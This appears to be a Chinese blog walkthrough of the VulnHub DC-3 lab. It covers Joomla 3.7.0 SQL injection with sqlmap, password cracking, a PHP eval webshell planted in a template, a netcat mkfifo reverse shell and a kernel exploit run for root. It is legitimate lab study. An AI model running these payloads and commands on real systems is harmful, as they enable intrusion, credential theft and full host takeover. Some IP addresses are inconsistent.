DC-3靶场实验

于 2024-10-07 20:14:39 发布
阅读量570 收藏 6
点赞数 5
文章标签: ci/cd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84683873/article/details/142622356
版权
实验环境搭建:

当出现DE 设备 (磁盘/CD-ROM)配置不正确。“ide0:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”。错误时,
将IDE改为0:0即可
在这里插入图片描述

478aaee9677b465580354514fc9d882c.jpg

KAI和DC-3都用NAT模式

下载靶场环境

    靶场下载地址:DC: 3.2 ~ VulnHub

渗透靶场

1.信息收集,寻找靶机真实的IP

靶场IP为:192.168.32.0/24

使用nmap -sP 192.168.32.0/24或者使用arp-scan -l,查看网段所有的主机,可以得到DC1的IP地址

nmap -sP 192.168.32.0/24

74044ff2df2640c58c0235595cc23d06.pngarp-scan -l

d3d5642e45f84cbe96ab4c2aa07e5380.png

 靶机的IP是:192.168.32.135

192.168.321 vm8网卡

192.168.32.2 网关

192.168.32.135 靶机

192.168.32.254 DHCP服务器

192.168.32.132 kali本机

2.信息收集以及探端口及服务

nmap -A -p- -v 192.168.32.135

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息963a2b975bf841cba959923008b465c9.png

发现开放了80端口,存在web服务,Apache/2.4.18,CMS为Joomla

a5c8a7d192f3494fa4739ad32665391b.png

他想告诉我们的是DC-3实战,任务是获得root权限

3.利用JoomScan进行扫描获取后台地址

   由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。

JoomScan简介

OWASPJoomla!漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。除此之外,OWASP JoomScan使用起来非常简单,不仅提供了非常友好的用户界面,而且还能够以HTML或文本格式导出扫描报告。

JoomScan简单使用

执行默认检测:

perl joomscan.pl --url www.example.com

perl joomscan.pl -u www.example.com

枚举已安装的组件:

perl joomscan.pl --url www.example.com --enumerate-components

perl joomscan.pl -u www.example.com –ec

设置cookie:

perl joomscan.pl --url www.example.com --cookie "test=demo;"

设置user-agent:

perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

perl joomscan.pl -u www.example.com -a "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

设置随机user-agent

perl joomscan.pl -u www.example.com --random-agent

perl joomscan.pl --url www.example.com -r

更新JoomScan:

perl joomscan.pl –update

joomScan扫描

apt install joomscan

joomscan --url http://192.168.32.135  提示没有joomscan 选择y安装

52fffceddacd457f98a2f48bfd8c844a.png

joomscan -u 192.168.32.135 扫描页面

e43fe29f6c59488a967ec3237fdb95c2.png

并未检测到相关漏洞,但检测到了后台路径和joomla 3.7

得到了网站后台地址http://192.168.32.135/administrator/

3585063375d6479680bc12cbf89b3627.png

4.利用nikto扫描获取后台地址

1.Nikto简介

    Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

2.Nikto简单使用

1、常规扫描

nikto -host/-h http://127.0.0.1

nikto -h http://127.0.0.1

2、可以指定端口进行扫描,同样可以指定SSL协议,进行HTTPS扫描。

nikto -h http:// 127.0.0.1 -p 443 ssl

3、指定子目录进行目录爆破

nikto -h http:// 127.0.0.1 -C /dvwa

4、批量扫描

nikto -host list.txt

5、升级更新插件

nikto -update

6、查看工具版本和插件版本

nikto -V

7、查看插件信息

nikto -list-plugins

8、命令查看帮助信息

nikto

9、查看更详细的帮助信息

nikto -H

man nikto

3.Nikto扫描

    我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描,这里就不拓展了。

nikto --url http://192.168.32.135/

2b33eaa5e4614d9b8fdc67ef76d2ef65.png

5.查找漏洞发现存在SQL注入

    我们前面知道了CMS为joomla,版本为3.7.0

所以可以使用searchsploit检查到有对应的漏洞

我们发现有一个SQL注入,还存在一个XSS

348bc01008ac48b3949a508dfb77f2af.png

我们可以查看这个漏洞的提示信息

searchsploit -m 42033.txt

12733094aec84c498a8c394ac1c5be3e.png

cat  42033.txt

937e47fc51e94fc8924a89dd43d1bb70.png

我们看到了POC,我们去验证一下,把localhost修改为我们的靶机IP就可以了

http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

看到提示,数据库语句错误,说明进行了拼接,存在SQL注入

3ea7c09daaec4669aa726c5eba17ec91.png

 6.sqlmap跑出数据

跑出所有数据库

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch

369e7427401844358fbc58a05bc6957d.png

成功的把数据库扫出来了

1c597ddbd9e648e9a748852bea513d6a.png

获取当前数据库的名字joomladb

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

f416aa6d42c14a28835e0ca34b701ca5.png

sqlmap -u "http://192.168.32.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

d37c8473c08e48b0af6194a8c843baa8.png

获取joomladb的users表的字段名

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个Y

f15ac58651744259bcfa668e5b9afc8a.png

第二个y不要使用默认的,不然会出错

84d2c5298f6d4553af8a17b5c942f13b.png

第三个选项随意我这里是1

513c2abb0ed64688baebf15ea5cddbb6.png

第四个10

80633d4271904a23bb98fa2dd953eb57.png

跑出来6个字段

2ebf454a499247f0ac51fe08d2906c63.png

获取目标字段username和password

sqlmap -u "http://192.168.32.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得结果如下
拿到一个用户名和加密的密码

ec13c374aed640ea81722af6aeb57330.png

利用john爆破密码snoopy

    使用john破解出admin密码,john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。破解时间取决于密码的复杂程度以及破解模式。

创建一个1.txt,把加密的密码字段写入

749c4e91ea4f4c53b33fdbea48f79b97.png

使用john破解出admin密码是snoopy

e757e0e0776c42caaf6eb74122b6b881.png

利用获取到的账号密码进行登录

http://192.168.32.135/administrator/

admin/snoopy

登陆成功

ada10cd52c094308a20a174d0a8ef117.png

7.上传webshell

    发现一个上传点

840cecf548a448e08d2e707523c2fd0e.png

点击Beez3 Details and Files进入

1af5e09c642f40f197bf4df028850cf5.png

点击newfiles

8b53f5ef67904f5b85a3378ec39987c5.png

这儿我们发现可以上传文件,考虑上传木马,也可以创建文件进行编辑

要上传木马,我们先要找到当前文件所在的目录:

6234aeff8c4d46078f369314ad6a2a13.png

http://192.168.32.135/templates/beez3/html/

6297d65ebce14b3e88f0afa479bbb195.png

回到刚才的页面点击new file
在html下创建一个php文件,名字叫做shell

136af018cd294653998843b183ad04be.png

    创建成功之后,跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

87eaf30c4ea543eaa13a5f1570a28717.png

再次访问http://192.168.32.135/templates/beez3/html/
发现多了一个shell.php文件,我们访问一下

08016a6faa234398af7157b77d6eed19.png

    访问webshell,得到我们设置的会先内容,文件上传成功

http://192.168.32.135/templates/beez3/html/shell.php

8193ac0d47c14f13a41a8499426067d4.png

8.蚁剑管理webshell

    右键添加数据

458ee1f37d7a47afb62acba81e2b94f1.png

右键进入虚拟终端执行whaomi查询我权限,是www-data权限

9642b1fc9a3d4c64840d6e7dc8f8ec13.png

9.反弹shell到kali

    蚁剑看到的终端不如kali清晰,反弹一个shell到kali

kali监听

nc -lvvp 1234

32b1fd06a94145979ff7c15501b132c1.png

靶机连接

nc -e /bin/bash 192.168.32.135 1234

此时我们发现-e参数不可用

4874956dfc214319bd9a005b53405c5f.png

    使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.32.135 1234 >/tmp/f

ls

10.创建交互式shell

    经常用shell的都知道这个shell不好用,我们建立一个交互式shell

    常用的就是python创建交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

11.使用辅助脚本发现提权漏洞

下载辅助脚本Linux-Exploit-Suggester.sh

    下载地址:

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool

上传辅助脚本

    我们可以直接在蚁剑中上传

上传成功

发现漏洞

ls -l linux-exploit-suggester.sh

    这时候我们发现没有执行权限,我们给他加个执行文件

chmod +x linux-exploit-suggester.sh

    执行脚本

./linux-exploit-suggester.sh

发现很多可利用漏洞

12.使用辅助脚本提权

获取提权脚本

    上面发现了很多漏洞,这里我们挑一个进行提权

挑选CVE-2016-4557

在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载

也可以去searchsploit里面去看看  

地址根上面一样也不能使用

可以使用下面地址直接下载

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

cd 33792

ls

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

执行完之后,提权成功

获得root权限

13.发现the-flag.txt

ls

cat the-flag.txt

到这就结束了,有哪里不完整不完善的欢迎评论区留言

2401_84683873
关注
DC-1靶场渗透实验
Alashan12的博客
05-05 1976
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1940
dc-2实验
kali dc-3靶场实验报告
最新发布
2401_84076530的博客
10-07 665
这里注意,因为我们要涉及到提权,所以我们需要一个完整的交互式的shell,我当前在哥斯拉上的webshell并不是交互式的shell,当我们执行vim或top甚至ping的时候,webshell都会卡死,执行提权脚本也不会反弹回root的shell,也就不能够满足我们的要求,所以这里我们需要升级成一个可交互的webshell。跑出来了,然后先别急,因为前方已经弱口令跑出来,所以这里就不通过它找管理员密码了,尝试写入webshell但是不知道网站绝对路径,所以这里先尝试用之前跑的目录进行信息收集。
DC-5靶场实战
qq_42754807的博客
03-28 841
DC-5靶场实战
vulnhub靶场DC-3
qq_58091216的博客
01-08 1371
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
DC-2靶场实验
2301_77261440的博客
09-28 646
RBASH是一种限制用户使用Bash shell的能力的措施,通过设置,可以限制用户访问的目录、可执行的命令以及环境变量的设置等,从而提高系统的安全性。例如,通过命令export PATH=$PATH:/bin/和export PATH=$PATH:/usr/bin/,用户可以尝试执行位于/bin/和/usr/bin/目录下的命令‌1。例如,通过输入:set shell=/bin/sh或:set shell=/bin/bash,可以切换到Bash或Shell环境,进而执行更多的命令‌2。
Vulnhub靶场 | DC系列 - DC3
哦 卷!
08-30 770
浏览器访问目标网站的 error.php文件(写入马的文件):http://192.168.10.149/templates/protostar/error.php。在msf中搜索joomla相关的脚本,使用joomla_version探测下joomla的版本。文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。根据joomla的特性,可以在模版中编辑模版文件,所以可以利用这一点进行写马。查找一下设置了suid的文件,并没有可以提权的命令。但是获取到的shell权限比较低。
DC-2靶场实验报告
jiaxingjia123的博客
09-28 912
DC-2实验报告
DC-1靶场实验步骤
xiaoyan2006的博客
09-25 1131
DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。
DC-2靶场实验过程
2401_84694887的博客
09-27 843
命令:wpscan --url http://dc-2 --passwords dc2.txt。wpscan --url http://dc-2 --enumerate t 扫描主题。wpscan --url http://dc-2 --enumerate p 扫描插件。wpscan --url http://dc-2 --enumerate u 枚举用户。命令:wpscan --url http://dc-2 --enumerate u。命令:cewl http://dc-2/ -w dict.txt。
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 380
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC系列漏洞靶场-渗透测试学习复现(DC-3)
W983079520的博客
12-02 1361
DC-3是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了linux内核漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-3靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口只有一个: 80(http默认端口)。 4 访问web 访问we
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1864
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2788
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
CI/CD详细流程
厄尔尼诺的博客
10-01 511
CI/CD(持续集成/持续交付或持续部署)自动化软件构建、测试和部署
基于GitLab 的持续集成环境
架构师吕师傅
10-04 1326
如果我们可以把每一层修改、安装、构建、操作的命令都写入一个脚本,用这个脚本来构建、定制镜像,那么之前提及的无法重复的问题、镜像构建透明性的问题、体积的问题就都会解决。指令包括:FROM、MAINTAINER、COPY、ADD、WORKDIR、VOLUME、EXPOSE、ENV、RUN、CMD、ENTRYPOINT、HEALTHCHECK、ONBUILD、USER、ARG、SHELL、STOPSIGNAL。dependencies关键字:定义了任务的依赖关系,比如依赖其他的项目、库、工具、任务等。
GitLab CI/CD脚本入门
ThatWeKnow
09-25 1214
工作中第一次用到gitlab自带的cicd, 记录一下备忘GitLab CI/CD 配置文件 () 中有许多关键字,用于定义不同的行为和阶段。
2019年计算机应用基础统考题库 网考计算机应用基础真题7.pdf
10-06
计算机试题试卷课件
MATLAB使用蚁群算法优化的BP神经网络(ACO-BP)进行多变量时间序列预测(包含详细的完整的程序和数据)
10-06
内容概要:本文详述了如何利用MATLAB实现蚁群算法优化的BP神经网络(ACO-BP),并通过实例演示这种优化方法如何应用于带有天气因子影响的发电量多变量时间序列预测任务上。介绍了ACO-BP的基础概念、算法实施过程以及代码实现,并通过计算均方根误差(RMSE)和平均绝对误差(MAE)验证优化模型的有效性和预测精准度。 适用人群:电气工程相关专业的学生,专注于数据分析与预测的专业人士。 使用场景及目标:适用于电力系统发电量预测的需求,尤其是需要考虑到气象参数变化对于发电产能的具体影响的情境下,用于提高模型预测准确性。 其他说明:提供的详细数据和源码有助于深入理解和实作优化BP网络解决多变数预测挑战,提升预测精度,为相关领域的科研工作者提供了一套完整的实验研究路径和理论参考文献清单。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值